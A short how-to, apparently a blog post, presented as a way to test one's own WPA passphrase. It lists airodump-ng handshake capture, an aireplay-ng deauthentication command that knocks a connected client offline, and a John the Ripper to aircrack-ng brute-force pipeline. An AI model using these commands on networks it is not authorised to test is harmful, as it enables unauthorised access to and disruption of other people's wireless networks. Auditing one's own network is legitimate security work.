WPA passphrase checking

How to check your WPA passphrase security.

How to check your WPA passphrase security.

Definitions:
BSSID=MAC of AP
$NIC=interface
$filename=filename prefix (SSID)
$CLIENTMAC=MAC of already connected client to network)
john=John The Ripper
$APMAC=MAC of targeted AP

Prerequisite:
your BSSID (airodump-ng $NIC)
Handshake ( airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w $filename) (forced with deauth command aireplay-ng -0 4 -a $APMAC -c $CLIENTMAC $NIC)

Action:
john –stdout –incremental:all | aircrack-ng -b bssid -w – $filename.cap

Notices:
It can be stoped by ctrl+c and after restored with progress (john --restore | aircrack-ng -b bssid -w - $filename.cap )

aircrack-ng -b bssid -w - $filename.cap //space before file is mandatory

file with progress i caled john.rec and it s autoamticaly backuped every 10 mins

Suburban Glory Web Design